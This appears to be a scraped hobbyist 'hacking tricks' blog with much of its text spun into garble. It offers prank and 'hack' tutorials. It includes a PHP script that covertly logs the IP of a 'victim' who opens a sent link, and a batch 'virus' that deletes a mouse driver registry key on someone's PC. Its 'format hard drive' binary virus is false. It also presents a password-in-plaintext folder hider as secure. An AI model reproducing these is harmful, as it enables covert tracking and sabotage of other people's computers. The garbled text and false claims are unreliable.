So you just started in python programming, and want to prank your Mates. Here I will teach you how to open any website on his computer using python.

Before you begin download and install python from Here

Step 1:
open notepad and type

import webbrowser

In python the "import" proclamation is utilized to add a module to your venture. For this situation we need to include the webbrowser module.

Step 2:

webbrowser.open('http://SITE HERE!.com')


This is calling the open function on your default web browser. You pass it an url in the form of a string.

Possible usages:
You can add as many websites as you want like show below


webbrowser.open('http://hackeyprince.blogspot.com')
webbrowser.open('http://google.com')
url = "http://hackeyprince.blogspot.com";

webbrowser.open(url)

The complete code will look something like below


import webbrowser
webbrowser.open('https://hackeyprince.blogspot.com')
webbrowser.open('http://google.com')
webbrowser.open('http://hackeyprince.cu.cc')

webbrowser.open('http://hackeyprince.wordpress.com')

Step 3

Save the file as visus.py (.py is MUST)

Enjoy pranking your friends and if you wish to learn more programming then check out our article below.

Top 6 Websites To Learn Computer Programming Languages

Welcome To Prinsu's Trick Zone 

Hello Friends, Myself Prince Patel and I m Gonna Tell You an Interesting Trick.
Prinsu's Trick Zone

So Friends, 

In this instructional exercise, you will learn cool and basic trap to Create an undeletable and unrenamable Folders In Windows working framework. The vast majority of the Peoples don't know that it is conceivable to make Undeletable, Unrenamable envelope in windows with no product. To Test this idea simply take after straightforward strides given beneath. 

Attempt to make another organizer in windows and give it name con,aux, lpt1, lpt2, lpt3 up to lpt9. you won't be permitted to make envelope with previously mentioned names, Because they are held words in windows. 

Step by step instructions to Create Undeletable And Unrenamable Folders ? 

Go to Start and after that Click on Run 

Sort cmd and hit enter (To open Command Prompt ). 

Keep in mind that you can't make Undeletable and Unrenamable organizer in your root catalog (i.e. where the windows is introduced) That implies you can't make this sort of organizer in C: drive in the event that you introduced windows on C: 

Sort D: or E: and hit enter 

Sort md con\ and hit enter (md - make registry) 

You may utilize different words, for example, aux, lpt1, lpt2, lpt3 up to lpt9 rather than con in above stride. 

Open that index, you will see the envelope made of name con

Attempt to erase that organizer or rename that envelope windows will demonstrate the blunder message. 

The most effective method to erase that organizer ? 

It is impractical to erase that organizer physically yet you can erase this envelope by another path said beneath. 

Open Command Prompt 

Sort D: ( if u made this kind of organizer in D: drive) and hit enter 

Sort rd con\ (rd - expel index) 

Open that catalog and the organizer won't show up on the grounds that it is expelled. 


Additional Interesting Tricks And Hacks



In my past post I had show to you for the most part acknowledged strategies to Grab some individual IP address. By and by I will show to you by and large acknowledged techniques to change IP address in less then a minute. Until additionally see it will take 2 to 3 minutes yet with some preparation you can do this inside a minute. 

Tap on "Start" in the base left corner of the screen. 

Tap on "RUN" 

Sort "all together" and snap OK 

You should be as of now at MSDOS incite Screen 

Sort "ipconfig/release" essentially like that, and press "enter" 

Sort "exit" and leave the actuate 

Right-tap on "Framework Places" or "My Network Places" on your desktop. 

Tap on "properties" 

Directly you should be on a screen with something titled "Neighborhood", or something to that effect, and, if you have a framework trapped, the dominant part of your distinctive frameworks. 

Right tap on "Neighborhood" and snap "properties" 

 tap on the "Internet Protocol (TCP/IP)" from the summary under the "General" tab 

Tap on "Use the going with IP address" under the "General" tab 

Influence an IP to address (It doesn't have any kind of effect what it is) 

Press "Tab" and it should normally fill in the "Subnet Mask" region with default numbers. 

Press the "okay" catch here 

Hit the "okay" catch again 

By and by you should have come back to the "Area" screen. 

Right-click back on "Neighborhood" and go to properties again. 

Retreat to the "TCP/IP" settings 

This time, select "Get an IP address normally" 

Tap on "okay" 

Hit "okay" afresh. 

Directly you have a New IP address. ๐Ÿ’€

Related Posts: I

KOI0I

[AMAZING TRICK]How To Grab Someone IP Address ?

Finding IP Address Of A Website Using Command Prompt Or CMD





Welcome To Prinsu's Tricks Zone


In this instructional exercise, I will you demonstrate to you generally accepted methods to snatch somebody Ip address utilizing PHP script.This strategy can be utilized to get somebody Ip address on yippee or Facebook talk or by sending letters to casualty. So Lets begin. 

Step by step instructions to Hack Someone Ip Address ? 

1. Duplicate the beneath codes into Notepad and spare it as Grab.php (.php is must)

<?php
$hostname = gethostbyaddr($_SERVER['REMOTE_ADDR']);
$img_number = imagecreate(400,95);
$backcolor = imagecolorallocate($img_number,10,102,153);
$textcolor = imagecolorallocate($img_number,255,255,255);

imagefill($img_number,0,0,$backcolor);
$number0 = " This is Your IP/Proxy";
$number1 = " IP: $_SERVER[HTTP_X_FORWARDED_FOR]";
$number2 = " Host/Proxy: $hostname";
$number4 = " _________________________________";

Imagestring($img_number,10,5,5,$number0,$textcolor);
Imagestring($img_number,10,5,25,$number1,$textcolor);
Imagestring($img_number,10,5,45,$number2,$textcolor);
Imagestring($img_number,10,5,50,$number4,$textcolor);
Imagestring($img_number,10,8,50,$number4,$textcolor);
Imagestring($img_number,10,5,10,$number4,$textcolor);
Imagestring($img_number,10,8,10,$number4,$textcolor);

header("Content-type: image/png");
imagepng($img_number);
$file=fopen("Name-here-to-protect-the-File.txt","a");
$file2 = "- IP joined - IP/Proxy: $_SERVER[HTTP_X_FORWARDED_FOR] - Host: $hostname - '\n' ";
fwrite($file, $file2);
fclose($file);
?>

     2. Presently make Free record on any of the free web facilitating locales Ripway or on My3gb . 

    3. Presently Upload Grab.php to your web facilitating webpage. 

    4. Duplicate the connection of your transferred document and send it to casualty. 

    5. When casualty will tap on your connection his IP will be spared in your free web facilitating website. 

    6. Appreciate you are Done !! 

    Other Interesting Hacks Related To Ip Address




    In this instructional exercise, I will demonstrate you to find Ip Address of any site using Command Prompt or in short CMD. Using IP Address you can find territory of the site server and fulfill more stuff. I will demostrate this instructional exercise with Google anyway you can use this system to find IP Address of any site like twitter, facebook et cetera. So lets start. 

    Directions to find IP ? 

    1. Go to Start > Type CMD and press Enter. 

    2. By and by form Ping taken after by site URL whose IP you have to find. 


    3. It will take less then a minute and thought of the results as exhibited as takes after.




    MORE TRICKS







    Prinsu's Trick Zone

    What IS RAT ?

    RAT remains for Remote Access Trojan or Remote Administration Tool. It is a standout amongst the most hazardous infection out their over the web. Programmer can utilize RAT to gain finish power to your PC. He can do fundamentally anything with your PC. Utilizing RAT programmer can introduce keylogger and different noxious infections remotely to your PC, contaminate documents on your framework and that's only the tip of the iceberg. In this post I will inform you regarding what programmer can do with your PC utilizing RAT and educate you concerning some ordinarily utilization of RAT by programmers.

    What You Can do With RAT ? 

    Once a RAT is introduced on any PC programmer can do practically anything with that PC. Some vindictive assignment that you can do with RAT are recorded beneath: 

    Tainting Files 

    Introducing Keyloggers 

    Controlling Computer 

    Remotely begin webcam, sounds, films and so on 

    Utilizing your PC to assault Website (DDOS) 

    View Screen 

    Innocuous RAT or Good RAT 

    As you have perceived how harmfull RAT are for your PC, however their are some great RAT which some of you may utilize day by day. You may have known about TeamViewer, it is a product which you use to control somebody's PC with his authorization for record exchange, sharing your screen and the sky is the limit from there. 

    Some Commonly Used RAT 


    ๐Ÿ’€ ProRAT 

    ๐Ÿ’€ CyberGate RAT 

    ๐Ÿ’€ DarkComet RAT 


     You May Also Like To Read



    In this instructional exercise I am will discuss the most utilized bit of programming. Other than from RAT by programmers to watch your exercises on your PC and that is keyloggers. A keylogger is a product or equipment gadget which screens every single key wrote by you on your console. I am will discuss diverse sorts of keylogger and how to be sheltered from keyloggers. So lets get the hang of somthing about keyloggers. 

    1. What is keylogger ? 


    You may have caught wind of keylogger yet truly dont realize what they are perusing this article will clear your psyche. A keylogger additionally know as keystroke lumberjack is programming or equipment gadget which screens every single key wrote by you on your console. You can not distinguish the nearness of keylogger on your PC since it keeps running in foundation and furthermore it is not recorded in errand chief or control board. It can be utilized by guardians to watch out for their childrens or organization proprietor to keep an eye on their employes. 

    2. How it can hurt you ? 


    In this area I will discuss how keylogger can hurt you in various courses for instance It can be utilized by your foe or companion to get delicate data, for example, your username and secret key, Bank Visa points of interest, or some other exercises you do on your PC. 

    Case: You login in to your Facebook account from a PC in which keylogger is introduce then your username and watchword will be caught. 

    3. Sorts of keyloggers 


    There are two sorts of keylogger equipment keylogger and programming keylogger. Programming keylogger is introduce in your PC where as a Hardware keylogger is appended to your console. Taking a gander at beneath pictures will clear your brain.

                                                           HARDWARE KEYLOGGER 


    SOFTWARE KEYLOGGER


    4. Step by step instructions to Protect yourself from keyloggers ? 


    Keylogger can be utilized by your adversary to get delicate data, for example, your Bank charge card points of interest, or watchword of any interpersonal interaction destinations and so forth. With a specific end goal to be sheltered continue following focuses in your psyche. 

    Never utilize your web based managing an account from digital bistro. In the event that you need to utilize then you can attempt this technique. open scratch pad and sort anything Then reorder each word that comes in your username or secret key. 

    You can even use above strategy to ensure your facebook profile, hurray or gmail id. 

    When you enter digital bistro ensure that no equipment gadget is appended to console wire. Its look something like above picture. 

    You May Also Like To Read


          Welcome To Prinsu's Trick Zone

    Patel Prince

    Today I will demonstrate you to make an infection to organize Hard circle utilizing twofold code. You can send this document to your companion or adversary to design their Hard circle. Be that as it may, kindly don't attempt this all alone PC or else you will wind up arranging your own particular PC. 

    The most effective method to Create Virus To Format Hard Drive ? 


    1. Duplicate the underneath codes into Notepad

    01001011000111110010010101010101010000011111100000 

    2. Spare the document as Format.exe 

    3. You just made infection to design Hard Drive. Appreciate !!! 

    Presently, RUN the File And It Will Boom the Hard Disk. 

    Scarcely any More Interesting Tricks BELOW




    Hey Friends,


    Today we will make a group infection which is hurt full it will handicap your mouse. So think before attempting it on yourself. 

    The most effective method to Disable Mouse 

    1. Open Notepad and duplicate underneath codes 

    rem ---------------------------------
    rem Disable Mouse
    set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
    reg delete %key%
    reg add %key% /v Start /t REG_DWORD /d 4
    rem ---------------------------------


    2. Spare this document as virus.bat 

    3. Done you just made your infection. 

    Appreciate!! BOOSTING SOMEONES MOUSE 

    Scarcely any More Interesting Tricks


    In this instructional exercise I will demonstrate you intriguing and usefull trap to secret key secure organizer without utilizing any product utilizing bunch record programming. This trap will deal with all windows stage (Win XP, Win 7). Take after beneath instructional exercise to take in this trap. 

    The most effective method to Lock Folder ? 


    1. Open Notepad and Copy code given underneath into it.

    cls
    @ECHO OFF
    title coolhacking-tricks.blogspot.com
    if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
    if NOT EXIST MyFolder goto MDMyFolder
    :CONFIRM
    echo Are you sure to lock this folder? (Y/N)
    set/p "cho=>"
    if %cho%==Y goto LOCK
    if %cho%==y goto LOCK
    if %cho%==n goto END
    if %cho%==N goto END
    echo Invalid choice.
    goto CONFIRM
    :LOCK
    ren MyFolder "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
    attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
    echo Folder locked
    goto End
    :UNLOCK
    echo Enter password to Unlock Your Secure Folder
    set/p "pass=>"
    if NOT %pass%== Hackeyprince goto FAIL
    attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
    ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" MyFolder
    echo Folder Unlocked successfully
    goto End
    :FAIL
    echo Invalid password
    goto end
    :MDMyFolder
    md MyFolder
    echo MyFolder created successfully
    goto End
    :End

     2. Spare the scratch pad document as lock.bat (.bat is must) 

    3. Presently double tap on lock.bat and another organizer will be made with name MyFolder 

    4. Duplicate every one of your information you need to ensure in that New envelope 

    5. Presently double tap on lock.bat and when charge promp shows up Type Y and press enter. 

    6. Presently MyFolder will be escaped you see, to get to that folder double tap on lock.bat 

    7. It will request secret word enter your watchword and done. (Default secret key is Hackeyprince) 

    To change the secret key supplant Hackeyprince with new watchword in the above code. 

    Step by step instructions to Further Secure ? 

    You may believe that anybody can get to the secret word by opening that lock.bat record in Notepad or some other content manager. To make it more secure cover up lock.bat in some safe area in the wake of following the above instructional exercise To get to the secured record double tap on lock.bat. I would propose duplicating lock.bat record into Pendrive and replicating it into your PC at whatever point you required to access to your ensured documents. 

    Barely any More Interesting Tricks

    Next PostNewer Posts Previous PostOlder Posts Home